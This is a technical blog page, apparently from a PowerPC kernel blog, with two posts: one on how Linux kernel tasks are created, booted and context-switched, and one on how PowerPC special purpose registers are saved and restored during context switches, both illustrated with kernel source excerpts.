Store Halfword Byte-Reverse Indexed

A Power Technical Blog

Lifecycle of a kernel task

Introduction

CPU cores are limited in number. Right now my computer tells me it's running around 500 processes, and I definitely do not have that many cores. The operating system's ability to virtualise work as independent 'executable units' and distribute them across the limited CPU pool is one of the foundations of modern computing.

The Linux kernel calls these virtual execution units tasks1. Each task encapsulates all the information the kernel needs to swap it in and out of running on a CPU core. This includes register state, memory mappings, open files, and any other resource that needs to be tied to a particular task. Nearly every work item in the kernel, including kernel background jobs and userspace processes, is handled by this unified task concept. The kernel uses a scheduler to determine when and where to run tasks according to some parameters, such as maximising throughput, minimising latency, or whatever other characteristics the user desires.

In this article, we'll dive into the lifecycle of a task in the kernel. This is a PowerPC blog, so any architecture specific (often shortened to 'arch') references are referring to PowerPC. To make the most out of this you should also have a copy of the kernel source open alongside you, to get a sense of what else is happening in the locations we discuss below. This article hyper-focuses on specific details of setting up tasks, leaving out a lot of possibly related content. Call stacks are provided to help orient yourself in many cases.

Booting

The kernel starts up with no concept of tasks, it just runs from the location the bootloader started it (the __start function for PowerPC). The first idea of a task takes root in early_setup() where we initialise the PACA (I asked, but what this stands for is unclear). The PACA is used to hold a lot of core per-cpu information, such as the CPU index (for generic per-cpu variables) and a pointer to the active task.

__start()  // ASM implementation, defined in head_64.S
  __start_initialization_multiplatform()
    __after_prom_start()
      start_here_multiplatform()
        early_setup()   // switched to C here, defined in setup_64.c
          initialise_paca()
            new_paca->__current = &init_task;

We use the PACA to (among other things) hold a reference to the active task. The task we start with is the special init_task. To avoid ambiguity with the userspace init task we see later, I'll refer to init_task as the boot task from here onwards. This boot task is a statically defined instance of a task_struct that is the root of all future tasks. Its resources are likewise statically defined, typically named following the pattern init_*. We aren't taking advantage of the context switching capability of tasks this early in boot, we just need to look like we're a task for any initialisation code that cares. For now we continue to work as a single CPU core with a single task.

We continue on and reach start_kernel(), the generic entry point of the kernel once any arch specific bootstrapping is sufficiently complete. One of the first things we call here is setup_arch(), which continues any initialisation that still needs to occur. This is where we call smp_setup_pacas() to allocate a PACA for each CPU; these all get the boot task as well (all referencing the same init_task structure, not copies of it). Eventually they will be given their own independent tasks, but during most of boot we don't do anything on them so it doesn't matter for now.

The next point of interest back in start_kernel() is fork_init(). Here we create a task_struct allocator to serve any task creation requests. We also limit the number of tasks here, dynamically picking the limit based on the available memory, page size, and a fixed upper bound.

void __init fork_init(void) {
    // ...
    /* create a slab on which task_structs can be allocated */
    task_struct_whitelist(&useroffset, &usersize);
    task_struct_cachep = kmem_cache_create_usercopy("task_struct",
            arch_task_struct_size, align,
            SLAB_PANIC|SLAB_ACCOUNT,
            useroffset, usersize, NULL);
    // ...
}

At the end of start_kernel() we reach rest_init() (as in 'do the rest of the init'). In here we create our first two dynamically allocated tasks: the init task (not to be confused with init_task, which we are calling the boot task), and the kthreadd task (with the double 'd'). The init task is (eventually) the userspace init process. We create it first to get the PID value 1, which is relied on by a number of things in the kernel and in userspace2. The kthreadd task provides an asynchronous creation mechanism for kthreads: callers append their thread parameters to a dedicated list, and the kthreadd task spawns any entries on the list whenever it gets scheduled. Creating these tasks automatically puts them on the scheduler run queue, and they might even start automatically with preemption.

// init/main.c

noinline void __ref __noreturn rest_init(void)
{
    struct task_struct *tsk;
    int pid;

    rcu_scheduler_starting();
    /*
     * We need to spawn init first so that it obtains pid 1, however
     * the init task will end up wanting to create kthreads, which, if
     * we schedule it before we create kthreadd, will OOPS.
     */
    pid = user_mode_thread(kernel_init, NULL, CLONE_FS);
    /*
     * Pin init on the boot CPU. Task migration is not properly working
     * until sched_init_smp() has been run. It will set the allowed
     * CPUs for init to the non isolated CPUs.
     */
    rcu_read_lock();
    tsk = find_task_by_pid_ns(pid, &init_pid_ns);
    tsk->flags |= PF_NO_SETAFFINITY;
    set_cpus_allowed_ptr(tsk, cpumask_of(smp_processor_id()));
    rcu_read_unlock();

    numa_default_policy();
    pid = kernel_thread(kthreadd, NULL, NULL, CLONE_FS | CLONE_FILES);
    rcu_read_lock();
    kthreadd_task = find_task_by_pid_ns(pid, &init_pid_ns);
    rcu_read_unlock();

    /*
     * Enable might_sleep() and smp_processor_id() checks.
     * They cannot be enabled earlier because with CONFIG_PREEMPTION=y
     * kernel_thread() would trigger might_sleep() splats. With
     * CONFIG_PREEMPT_VOLUNTARY=y the init task might have scheduled
     * already, but it's stuck on the kthreadd_done completion.
     */
    system_state = SYSTEM_SCHEDULING;

    complete(&kthreadd_done);

    /*
     * The boot idle thread must execute schedule()
     * at least once to get things moving:
     */
    schedule_preempt_disabled();
    /* Call into cpu_idle with preempt disabled */
    cpu_startup_entry(CPUHP_ONLINE);
}

After this, the boot task calls cpu_startup_entry(), which transforms it into the idle task for the boot CPU and enters the idle loop. We're now almost fully task driven, and our journey picks back up inside of the init task.

Bonus tip: when looking at the kernel boot console, you can tell what print actions are performed by the boot task vs the init task. The init_task has PID 0, so lines start with T0. The init task has PID 1, so appears as T1.

[    0.039772][    T0] printk: legacy console [hvc0] enabled
...
[   28.272167][    T1] Run /init as init process

The init task

When we created the init task, we set the entry point to be the kernel_init() function. Execution simply begins from here3 once it gets woken up for the first time. The very first thing we do is wait4 for the kthreadd task to be created: if we were to try and create a kthread before this, when the kthread creation mechanism tries to wake up the kthreadd task it would be using an uninitialised pointer, causing an oops. To prevent this, the init task waits on a completion object that the boot task marks completed after creating kthreadd. We could technically avoid this synchronization altogether just by creating kthreadd first, but then the init task wouldn't have PID 1.

The rest of the init task wraps up the initialisation stage as a whole. Mostly it moves the system into the 'running' state after freeing any memory marked as for initialisation only (set by __init annotations). Once fully initialised and running, the init task attempts to execute the userspace init program.

    if (ramdisk_execute_command) {
        ret = run_init_process(ramdisk_execute_command);
        if (!ret)
            return 0;
        pr_err("Failed to execute %s (error %d)\n",
               ramdisk_execute_command, ret);
    }

    if (execute_command) {
        ret = run_init_process(execute_command);
        if (!ret)
            return 0;
        panic("Requested init %s failed (error %d).",
              execute_command, ret);
    }

    if (CONFIG_DEFAULT_INIT[0] != '\0') {
        ret = run_init_process(CONFIG_DEFAULT_INIT);
        if (ret)
            pr_err("Default init %s failed (error %d)\n",
                   CONFIG_DEFAULT_INIT, ret);
        else
            return 0;
    }

    if (!try_to_run_init_process("/sbin/init") ||
        !try_to_run_init_process("/etc/init") ||
        !try_to_run_init_process("/bin/init") ||
        !try_to_run_init_process("/bin/sh"))
        return 0;

    panic("No working init found.  Try passing init= option to kernel. "
          "See Linux Documentation/admin-guide/init.rst for guidance.");

What file the init process is loaded from is determined by a combination of the system's filesystem, kernel boot arguments, and some default fallbacks. The locations it will attempt, in order, are:

  1. Ramdisk file set by rdinit= boot command line parameter, with default path /init. An initcall run earlier searches the boot arguments for rdinit and initialises ramdisk_execute_command with it. If the ramdisk does not contain the requested file, then the kernel will attempt to automatically mount the root device and use it for the subsequent checks.
  2. File set by init= boot command line parameter. Like with rdinit, the execute_command variable is initialised by an early initcall looking for init in the boot arguments.
  3. /sbin/init
  4. /etc/init
  5. /bin/init
  6. /bin/sh

Should none of these work, the kernel just panics. Which seems fair.

Aside: secondary processors

Until now we've focused on the boot CPU. While the utility of a task still applies to a uniprocessor system (perhaps even more so than one with hardware parallelism), a nice benefit of encapsulating all the execution state into a data structure is the ability to load the task onto any other compatible processor on the system. But before we can start scheduling on other CPU cores, we need to bring them online and initialise them to a state ready for the scheduler.

On the pSeries platform, the secondary CPUs are held by the firmware until explicitly released by the guest. Early in boot, the boot CPU (not task! We don't have tasks yet) will iterate the list of held secondary processors and release them one by one to the __secondary_hold function. As each starts executing __secondary_hold, it writes a value to the __secondary_hold_acknowledge variable that the boot CPU is watching. The secondary processor then immediately starts spinning on __secondary_hold_spinloop, waiting for it to become non-zero, while the boot CPU moves on to the the next processor.

// Boot CPU releasing the coprocessors from firmware

__start()
  __start_initialization_multiplatform()
    __boot_from_prom()
      prom_init()    // switched to C here
        prom_hold_cpus()
          // secondary_hold is alias for __secondary_hold assembly function
          call_prom("start-cpu", ..., secondary_hold, ...);  // on each coprocessor

Once every coprocessor is confirmed to be spinning on __secondary_hold_spinloop, the boot CPU continues on with its boot sequence. Once we reach setup_arch() as above, the boot task invokes smp_release_cpus() early in start_kernel(), which writes the desired entry point address of the coprocessors to __secondary_hold_spinloop. All the spinning coprocessors now see this value, and jump to it. This function, generic_secondary_smp_init(), will set up the coprocessor's PACA value, perform some machine specific initialisation if cur_cpu_spec->cpu_restore is set,5 atomically decrement a spinning_secondaries variable, and start spinning once again until further notice. This time it is waiting on the PACA field cpu_start, so we can start coprocessors individually.

We leave the coprocessors here for a while, until the init task calls kernel_init_freeable(). This function is used for any initialisation required after kthreads are running, but before all the __init sections are dropped. The setup relevant to coprocessors is the call to smp_init(). Here we fork the current task (the init task) once for each coprocessor with idle_threads_init(). We then call bringup_nonboot_cpus() to make each coprocessor start scheduling.

The exact code paths here are both deep and indirect, so here's the interesting part of the call tree for the pSeries platform to help guide you through the code.

// In the init task

smp_init()
  idle_threads_init()     // create idle task for each coprocessor
  bringup_nonboot_cpus()  // make each coprocessor enter the idle loop
    cpuhp_bringup_mask()
      cpu_up()
        _cpu_up()
          cpuhp_up_callbacks()  // invokes the CPUHP_BRINGUP_CPU .startup.single function
            bringup_cpu()
              __cpu_up()
                cpu_idle_thread_init()  // sets CPU's task in PACA to its idle task
                smp_ops->prepare_cpu()  // on pSeries inits XIVE if in use
                smp_ops->kick_cpu()     // indirect call to smp_pSeries_kick_cpu()
                  smp_pSeries_kick_cpu()
                    paca_ptrs[nr]->cpu_start = 1  // the coprocessor was spinning on this value

Interestingly, the entry point declared when cloning the init task for the coprocessors is never used. This is because the coprocessors never get woken up from the hand-crafted init state the way new tasks normally would. Instead they are already executing a code path, and so when they next yield they will just clobber the entry point and other registers with their actually running task state.

Transitioning the init task to userspace

The last remaining job of the kernel side of the init task is to actually load in and execute the selected userspace program. It's not like we can just call the userspace entry point though: we need to be a little creative here.

As alluded to above, when we create tasks with clone_thread(), it doesn't set the provided entry point directly: it instead sets a small shim that is actually used when the new task eventually gets woken up. The particular shim it uses is determined by whether the task is a kthread or not.

Both kinds of shim expect the requested entry point to be passed via a specific non-volatile register and, in the case of a kthread, basically just invokes it after some minor bookkeeping. A kthread should never return directly, so it traps if this happens.

_GLOBAL(start_kernel_thread)
    bl  CFUNC(schedule_tail)
    mtctr   r14
    mr  r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
    mr  r12,r14
#endif
    bctrl
    /*
     * This must not return. We actually want to BUG here, not WARN,
     * because BUG will exit the process which is what the kernel thread
     * should have done, which may give some hope of continuing.
     */
100:    trap
    EMIT_BUG_ENTRY 100b,__FILE__,__LINE__,0

But the init task isn't a kthread. We passed a kernel entrypoint to copy_thread() but did not set the kthread flag, so copy_thread() inferred that this means the task will eventually run in userspace. This makes it use the ret_from_kernel_user_thread() shim.

_GLOBAL(ret_from_kernel_user_thread)
    bl  CFUNC(schedule_tail)
    mtctr   r14
    mr  r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
    mr  r12,r14
#endif
    bctrl
    li  r3,0
    /*
     * It does not matter whether this returns via the scv or sc path
     * because it returns as execve() and therefore has no calling ABI
     * (i.e., it sets registers according to the exec()ed entry point).
     */
    b   .Lsyscall_exit

We start off identically to a kthread, except here we expect the task to return. This is the key: when the init task wants to transition to userspace, it sets up the stack frame as if we were serving a syscall. It then returns, which runs the syscall exit procedure that culminates in an rfid to userspace.

The actual setting up of the syscall frame is handled by the (try_)run_init_process() function. The interesting call path goes like

run_init_process()
  kernel_execve()
    bprm_execve()
      exec_binprm()
        search_binary_handler()
          list_for_each_entry(fmt, &formats, lh)
            retval = fmt->load_binary(bprm);

The outer few calls mainly handle checking prerequisites and bookkeeping. The exec_binrpm() call also handles shebang redirection, allowing up to 5 levels of interpreter. At each level it invokes search_binary_handler(), which attempts to find a handler for the program file's format. Contrary to the name, the searcher will also immediately try to load the file if it finds an appropriate handler. It's this call to load_binary (dispatched to whatever handler was found) that sets up our userspace execution context, including the syscall return state.

All that's left to do here is return 0 all the way up the chain, which you'll see results in the init task returning to the shim that performs the syscall return sequence to userspace. The init task is now fully userspace.

Creating other tasks

It feels like we've spent a lot of time discussing the init task. What about all the other tasks?

It turns out that the creation of the init task is very similar to any other task. All tasks are clones of the task that created them (except the statically defined init_task). Note 'clone' is being used in a loose sense here: it's not an exact image of the parent. There's a configuration parameter that determines which components are shared, and which are made into independent copies. The implementation may also just decide to change some things that don't make sense to duplicate, such as the task ID to distinguish it from the parent.

As we saw earlier, kthreads are created indirectly through a global list and kthreadd daemon task that does the actual cloning. This has two benefits: allowing asynchronous task creation from atomic contexts, and ensuring all kthreads inherit a 'clean' task context, instead of whatever was active at the time.

Userspace task creation, beyond the init task, is driven by the userspace process invoking the fork() and clone() family of syscalls. Both of these are light wrappers over the kernel_clone() function, which we used earlier for the creation of the init task and kthreadd.

When a task runs a syscall in the exec() family, it doesn't create a new task. It instead hits the same code path as when we tried to run the userspace init program, where it loads in the context as defined by the program file into the current task and returns from the syscall (legitimately this time).

Context switching

The last piece of the puzzle (as far as this article will look at!) is how tasks are switched in and out, and some of the rules around when it can and can't happen. Once the init and kthreadd tasks are created, we call cpu_startup_entry(CPUHP_ONLINE). Any coprocessors have also been released to call this by now too. Their tasks are repurposed to 'idle tasks', which serve to run when no other tasks are available to run. They will spin on a check for pending work, entering an idle state each loop until they see pending tasks to run. They then call __schedule() in a loop (also conditional on pending tasks existing), and then return back to the idle loop once everything in the moment is handled.

The __schedule() function is the main guts of the scheduler, which until now has seemed like some nebulous controller that's governing when and where our tasks run. In reality it isn't one isolated part of the system, but a function that a task calls when it decides to yield to any other waiting tasks. It starts by deciding which pending task should run (a whole can of worms right there), and then executing context_switch() if it changes from the current task. context_switch() is the point where the current task starts to change. Specifically, you can trace the changing of current (i.e., the PACA being updated with a new task pointer) to the following path

context_switch()
  switch_to()
    __switch_to()
      _switch()
        do_switch_64
          std   r6,PACACURRENT(r13)

One interesting consequence of tasks calling context_switch() is that the previous task is 'suspended'6 right where it saves its registers and puts in the new task's values. When it is woken up again at some point in the future it resumes right where it left off. So when you are reading the __switch_to() implementation, you are actually looking at two different tasks in the same function.

But it gets even weirder: while tasks that put themselves to sleep here wake up inside of _switch(), new tasks being woken up for the first time start at a completely different location! So not only is the task changing, the _switch() call might not even return back to __switch_to()!

Conclusion

And there you have it, everything[citation needed] you could ever need to know when getting started with tasks. Will you need to know this specifically? Hard to say. But hopefully it at least provides some useful pointers for understanding the execution model of the kernel.

Questions

The following are some questions you might have (read: I had).

Do we change the task struct when serving a syscall?

No, the task struct stays the same. The task struct declares it represents a userspace task, but it stays as the active task when serving syscalls or similar actions on behalf of its userspace execution.

Thanks to address space quadrants we don't even need to change the active memory mapping: upon entry to the kernel we automatically start using the PID 0 mapping.

Where does a task get allocated a PID?

Software PIDs are allocated when spawning a new process. However, if the process shares memory mappings with another (such as threads can), it may not be allocated a new hardware PID. Referring to the PID used for virtual memory translations, the hardware PID is actually a property of the memory mapping struct (mm_struct). You can find a hardware PID being allocated when a new mm_struct is created, which may or may not occur depending on the task clone parameters.

How can the fork and exec syscalls be hooked into for arch specific handling?

Fork (and clone) will always invoke copy_thread(). The exec call will invoke start_thread() when loading a binary file. Any other kind of file (script, binfmt-misc) will eventually require some form of binary file to load/bootstrap it, so start_thread() should work for your purposes. You can also use arch_setup_new_exec() for a cleaner hook into exec.

The task context of the calls is fairly predictable: current in copy_thread() refers to the parent because we are still in the middle of copying it. For start_thread(), current refers to the task that is going to be the new program because it is just configuring itself.

Where do exceptions/interrupts fit in?

When a hardware interrupt triggers it just stops whatever it was doing and dumps us at the corresponding exception handler. Our current value still points to whatever task is active (restoring the PACA is done very early). If we were in userspace (MSRPR was 1) we consider ourselves to be in 'process context'. This is, in some sense, the default state in the kernel. We are able to sleep (i.e., invoke the scheduler and swap ourselves out), take locks, and generally do anything you might like to do in the kernel. This is in contrast to 'atomic context', where certain parts of the kernel expect to be executed without interruption or sleeping.

However, we are a bit more restricted if we arrived at an interrupt from supervisor mode. For example, we don't know if we interrupted an atomic context, so we can't safely do anything that might cause sleep. This is why in some interrupt handlers like do_program_check() we have to check user_mode(regs) before we can read a userspace instruction7.


  1. Read more on tasks in my previous post 

  2. One example of the init task being special is that the kernel will not allow its process to be killed. It must always have at least one thread. 

  3. Well, it actually begins at a small assembly shim, but close enough for now. 

  4. The wait mechanism itself is an interesting example of interacting with the scheduler. Starting with a common struct completion object, the waiting task registers itself as awaiting the object to complete. Specifically, it adds its task handle to a queue on the completion object. It then loops calling schedule(), yielding itself to other tasks, until the completion object is flagged as done. Somewhere else another task marks the completion object as completed. As part of this, the task marking the completion tries to wake up any task that has registered itself as waiting earlier. 

  5. The cur_cpu_spec->cpu_restore machine specific initialisation is based on the machine that got selected in arch/powerpc/kernel/cpu_specs_book3s_64.h. This is where the __restore_cpu_* family of functions might be called, which mostly initialise certain SPRs to sane values. 

  6. Don't forget that the entire concept of tasks is made up by the kernel: from the hardware's point of view we haven't done anything interesting, just changed some registers. 

  7. The issue with reading a userspace instruction is that the page access may require the page be faulted in, which can sleep. There is a mechanism to disable the page fault handler specifically, but then we might not be able to read the instruction. 

Context switching SPRs on PowerPC

Introduction

This post is a dive (well, more of a meander) through some of the PowerPC specific aspects of context switching, especially on the Special Purpose Register (SPR) handling. It was motivated by my recent work on adding kernel support for a hardware feature that interfaces with software through an SPR.

What's a context anyway?

The context we are concerned about in this post is the task context. That's all the state that makes up a 'task' in the eyes of the kernel. These are resources like registers, the thread ID, memory mappings, and so on. The kernel is able to save and restore this state into a task context data structure, allowing it to run arbitrarily many tasks concurrently despite the limited number of CPU cores available. It can simply save these resource values when switching out a task, and replace the CPU state with the values stored by the task being switched in.

Unless you're a long time kernel developer, chances are you haven't heard of or looked too closely at a 'task' in the kernel. The next section gives a rundown of tasks and processes, giving you a better frame of reference for the later context switching discussion.

Processes, threads, and tasks

To understand the difference between these three concepts, we'll start with how the kernel sees everything: tasks. Tasks are the kernel's view of an 'executable unit' (think single threaded process), a self contained thread of execution that has a beginning, performs some operations, then (maybe) ends. They are the indivisible building blocks upon which multitasking and multithreading can be built, where multiple tasks run independently, or optionally communicate in some manner to distribute work.

The kernel represents each task with a struct task_struct. This is an enormous struct (around 10KB) of all the pieces of data people have wanted to associate with a particular unit of execution over the decades. The architecture specific state of the task is stored in a one-to-one mapped struct thread_struct, available through the thread member in the task_struct. The name 'thread' when referring to this structure on a task should not be confused with the concept of a thread we'll visit shortly.

A task is highly flexible in terms of resource sharing. Many resources, such as the memory mappings and file descriptor tables, are held through reference counted handles to a backing data structure. This makes it easy to mix-and-match sharing of different components between other tasks.

Approaching tasks from the point of view of userspace, here we think of execution in terms of processes and threads. If you want an 'executable unit' in userspace, you are understood to be talking about a process or thread. These are implemented as tasks by the kernel though; a detail like running in userspace mode on the CPU is just another property stored in the task struct.

For an example of how tasks can either copy or share their parent's resources, consider what happens when creating a child process with the fork() syscall. The child will share memory and open files at the time of the fork, but further changes to these resources in either process are not visible to the other. At the time of the fork, the kernel simply duplicates the parent task and replaces relevant resources with copies of the parent's values1.

It is often useful to have multiple processes share things like memory and open files though: this is what threads provide. A process can be 'split' into multiple threads2, each backed by its own task. These threads can share resources that are normally isolated between processes.

This thread creation mechanism is very similar to process creation. The clone() family of syscalls allow creating a new thread that shares resources with the thread that cloned itself. Exactly what resources get shared between threads is highly configurable, thanks to the kernel's task representation. See the clone(2) manpage for all the options. Creating a process can be thought of as creating a thread where nothing is shared. In fact, that's how fork() is implemented under the hood: the fork() syscall is implemented as a thin wrapper around clone()'s implementation where nothing is shared, including the process group ID.

// kernel/fork.c  (approximately)

SYSCALL_DEFINE0(fork)
{
    struct kernel_clone_args args = {
        .exit_signal = SIGCHLD,
    };

    return kernel_clone(&args);
}

SYSCALL_DEFINE2(clone3, struct clone_args __user *, uargs, size_t, size)
{
    int err;

    struct kernel_clone_args kargs;
    pid_t set_tid[MAX_PID_NS_LEVEL];

    kargs.set_tid = set_tid;

    err = copy_clone_args_from_user(&kargs, uargs, size);
    if (err)
        return err;

    if (!clone3_args_valid(&kargs))
        return -EINVAL;

    return kernel_clone(&kargs);
}

pid_t kernel_clone(struct kernel_clone_args *args) {
    // do the clone
}

That's about it for the differences in processes, threads, and tasks from the point of view of the kernel. A key takeaway here is that, while you will often see processes and threads discussed with regards to userspace programs, there is very little difference under the hood. To the kernel, it's all just tasks with various degrees of shared resources.

Special Purpose Registers (SPRs)

As a final prerequisite, in this section we look at SPRs. The SPRs are CPU registers that, to put it simply, provide a catch-all set of functionalities for interacting with the CPU. They tend to affect or reflect the CPU state in various ways, though are very diverse in behaviour and purpose. Some SPRs, such as the Link Register (LR), are similar to GPRs in that you can read and write arbitrary data. They might have special interactions with certain instructions, such as the LR value being used as the branch target address of the blr (branch to LR) instruction. Others might provide a way to view or interact with more fundamental CPU state, such as the Authority Mask Register (AMR) which the kernel uses to disable accesses to userspace memory while in supervisor mode.

Most SPRs are per-CPU, much like GPRs. And, like GPRs, it makes sense for many of them to be tracked per-task, so that we can conceptually treat them as a per-task resource. But, depending on the particular SPR, writing to them can be slow. The highly used data-like SPRs such as LR, CTR (Count Register), etc., are possible to rename, making them comparable to GPRs in terms of read/write performance. But others that affect the state of large parts of the CPU core, such as the Data Stream Control Register (DSCR), can take a while for the effects of changing them to be applied. Well, not so slow that you will notice the occasional access, but there's one case in the kernel that occurs extremely often and needs to change a lot of these SPRs to support our per-task abstraction: context switches.

Anatomy of a context switch

Here we'll explore the actual function behind performing a context switch. We're interested in the SPR handling especially, because that's going to inform how we start tracking a new SPR on a per-task basis, so we'll be skimming over a lot of unrelated aspects.

We start our investigation in the aptly named context_switch() function in kernel/sched/core.c.

// kernel/sched/core.c

/*
 * context_switch - switch to the new MM and the new thread's register state.
 */
static __always_inline struct rq *
context_switch(struct rq *rq, struct task_struct *prev,
               struct task_struct *next, struct rq_flags *rf)

Along with some scheduling metadata, we see it takes a previous task and a next task. As we discussed above, the struct task_struct type describes a unit of execution that defines (among other things) how to set up the state of the CPU.

This function starts off with some generic preparation and memory context changes3, before getting to the meat of the function with switch_to(prev, next,prev). This switch_to() call is actually a macro, which unwraps to a call to __switch_to(). It's also at this point that we enter the architecture specific implementation.

// arch/powerpc/include/asm/switch_to.h  (switch_to)
// arch/powerpc/kernel/process.c         (__switch_to)

struct task_struct *__switch_to(struct task_struct *prev,
                                struct task_struct *new)

Here we've only got our previous and next tasks to work with, focusing on just doing the switch.

Once again, we'll skip through most of the implementation. You'll see a few odds and ends being handled: asserting we won't be taking any interrupts, handling some TLB flushing, a copy-paste edge case, and some breakpoint handling on certain platforms. Then we reach what we were looking for: save_sprs(). The relevant section looks something like as follows

    /*
     * We need to save SPRs before treclaim/trecheckpoint as these will
     * change a number of them.
     */
    save_sprs(&prev->thread);

    /* Save FPU, Altivec, VSX and SPE state */
    giveup_all(prev);

    __switch_to_tm(prev, new);

    if (!radix_enabled()) {
        /*
         * We can't take a PMU exception inside _switch() since there
         * is a window where the kernel stack SLB and the kernel stack
         * are out of sync. Hard disable here.
         */
        hard_irq_disable();
    }

    /*
     * Call restore_sprs() and set_return_regs_changed() before calling
     * _switch(). If we move it after _switch() then we miss out on calling
     * it for new tasks. The reason for this is we manually create a stack
     * frame for new tasks that directly returns through ret_from_fork() or
     * ret_from_kernel_thread(). See copy_thread() for details.
     */
    restore_sprs(old_thread, new_thread);

The save_sprs() function itself does the following to its prev->thread argument.

// arch/powerpc/kernel/process.c

static inline void save_sprs(struct thread_struct *t)
{
#ifdef CONFIG_ALTIVEC
    if (cpu_has_feature(CPU_FTR_ALTIVEC))
        t->vrsave = mfspr(SPRN_VRSAVE);
#endif
#ifdef CONFIG_SPE
    if (cpu_has_feature(CPU_FTR_SPE))
        t->spefscr = mfspr(SPRN_SPEFSCR);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
    if (cpu_has_feature(CPU_FTR_DSCR))
        t->dscr = mfspr(SPRN_DSCR);

    if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
        t->bescr = mfspr(SPRN_BESCR);
        t->ebbhr = mfspr(SPRN_EBBHR);
        t->ebbrr = mfspr(SPRN_EBBRR);

        t->fscr = mfspr(SPRN_FSCR);

        /*
         * Note that the TAR is not available for use in the kernel.
         * (To provide this, the TAR should be backed up/restored on
         * exception entry/exit instead, and be in pt_regs.  FIXME,
         * this should be in pt_regs anyway (for debug).)
         */
        t->tar = mfspr(SPRN_TAR);
    }

    if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE))
        t->hashkeyr = mfspr(SPRN_HASHKEYR);
#endif
}

Later, we set up the SPRs of the new task with restore_sprs():

// arch/powerpc/kernel/process.c

static inline void restore_sprs(struct thread_struct *old_thread,
                struct thread_struct *new_thread)
{
#ifdef CONFIG_ALTIVEC
    if (cpu_has_feature(CPU_FTR_ALTIVEC) &&
        old_thread->vrsave != new_thread->vrsave)
        mtspr(SPRN_VRSAVE, new_thread->vrsave);
#endif
#ifdef CONFIG_SPE
    if (cpu_has_feature(CPU_FTR_SPE) &&
        old_thread->spefscr != new_thread->spefscr)
        mtspr(SPRN_SPEFSCR, new_thread->spefscr);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
    if (cpu_has_feature(CPU_FTR_DSCR)) {
        u64 dscr = get_paca()->dscr_default;
        if (new_thread->dscr_inherit)
            dscr = new_thread->dscr;

        if (old_thread->dscr != dscr)
            mtspr(SPRN_DSCR, dscr);
    }

    if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
        if (old_thread->bescr != new_thread->bescr)
            mtspr(SPRN_BESCR, new_thread->bescr);
        if (old_thread->ebbhr != new_thread->ebbhr)
            mtspr(SPRN_EBBHR, new_thread->ebbhr);
        if (old_thread->ebbrr != new_thread->ebbrr)
            mtspr(SPRN_EBBRR, new_thread->ebbrr);

        if (old_thread->fscr != new_thread->fscr)
            mtspr(SPRN_FSCR, new_thread->fscr);

        if (old_thread->tar != new_thread->tar)
            mtspr(SPRN_TAR, new_thread->tar);
    }

    if (cpu_has_feature(CPU_FTR_P9_TIDR) &&
        old_thread->tidr != new_thread->tidr)
        mtspr(SPRN_TIDR, new_thread->tidr);

    if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE) &&
        old_thread->hashkeyr != new_thread->hashkeyr)
        mtspr(SPRN_HASHKEYR, new_thread->hashkeyr);
#endif

}

The gist is we first perform a series of mfspr operations, saving the SPR values of the currently running task into its associated task_struct. Then we do a series of mtspr operations to restore the desired values of the new task back into the CPU.

This procedure has two interesting optimisations, as explained by the commit that introduces save_sprs() and restore_sprs():

powerpc: Create context switch helpers save_sprs() and restore_sprs()

Move all our context switch SPR save and restore code into two helpers. We do a few optimisations:

  • Group all mfsprs and all mtsprs. In many cases an mtspr sets a scoreboarding bit that an mfspr waits on, so the current practise of mfspr A; mtspr A; mfpsr B; mtspr B is the worst scheduling we can do.

  • SPR writes are slow, so check that the value is changing before writing it.

And that's basically it, as far as the implementation goes at least. When first investigating this one question that kept nagging me was: why do we read these values here, instead of tracking them as they are set? I can think of several reasons this might be done:

  1. It's more robust to check at the time of swap what the current value is. You otherwise risk that a single inline assembly mtspr in a completely different part of the codebase breaks context switching. It would also mean that every mtspr would have to disable interrupts, lest the context switch occurs between the mtspr and recording the change in the task struct.
  2. It might be faster. Changing an SPR would need an accompanying write to the task struct. This is pessimistic if there are many such changes to the SPR between context switches.
  3. Even if you were to track every mtspr correctly, certain SPRs can be changed by userspace without kernel assistance. Some of these SPRs are also unused by the kernel, so saving them with the GPRs would be pessimistic (a waste of time if the task ends up returning back to userspace without swapping). For example, VRSAVE is an unprivileged scratch register that the kernel doesn't make use of.

Did you catch the issue with restore_sprs()?

If you paid close attention, you might have noticed that the previous task being passed to restore_sprs() is not the same as the one being passed to save_sprs(). We have the following instead

struct task_struct *__switch_to(struct task_struct *prev,
    struct task_struct *new)
{
    // ...
    new_thread = &new->thread;
    old_thread = &current->thread;
    // ...
    save_sprs(&prev->thread);             // using prev->thread
    // ...
    restore_sprs(old_thread, new_thread); // using old_thread (current->thread)
    // ...
    last = _switch(old_thread, new_thread);
    // ...
    return last;
}

What gives? As far as I can determine, we require that the prev argument to __switch_to is always the currently running task (as opposed being in some dedicated handler or ill-defined task state during the switch). And on PowerPC, we can access the currently running task's thread struct through the current macro. So, in theory, current->thread is an alias for prev->thread. Anything else wouldn't make any sense here, as we are storing the SPR values into prev->thread, but making decisions about their values in restore_sprs() based on the current->thread saved values.

As for why we use both, it appears to be historical. We originally ran restore_sprs() after _switch(), which finishes swapping state from the original thread to the one being loaded in. This means our stack and registers are swapped out, so our prev variable we stored our current SPRs in is lost to us: it is now the prev of the task we just woke up. In fact, we've completely lost any handle to the task that just swapped itself out. Well, almost: that's where the last return value of _switch() comes in. This is a handle to the task that just went to sleep, and we were originally reloading old_thread based on this last value. However a future patch moved restore_sprs() to above the _switch() call thanks to an edge case with newly created tasks, but the use of old_thread apparently remained.

Conclusion

Congratulations, you are now an expert on several of the finer details of context switching on PowerPC. Well, hopefully you learned something new and/or interesting at least. I definitely didn't appreciate a lot of the finer details until I went down the rabbit hole of differentiating threads, processes, and tasks, and the whole situation with prev vs old_thread.

Bonus tidbit

This is completely unrelated, but the kernel's implementation of doubly-linked lists does not follow the classic implementation, where a list node contains a next, previous, and data pointer. No, if you look at the actual struct definition you will find

struct hlist_node {
    struct hlist_node *next, **pprev;
};

which decidedly does not contain any data component.

It turns out that the kernel expects you to embed the node as a field on the data struct, and the data-getter applies a mixture of macro and compiler builtin magic to do some pointer arithmetic to convert a node pointer into a pointer to the structure it belongs to. Naturally this is incredibly type-unsafe, but it's elegant in its own way.


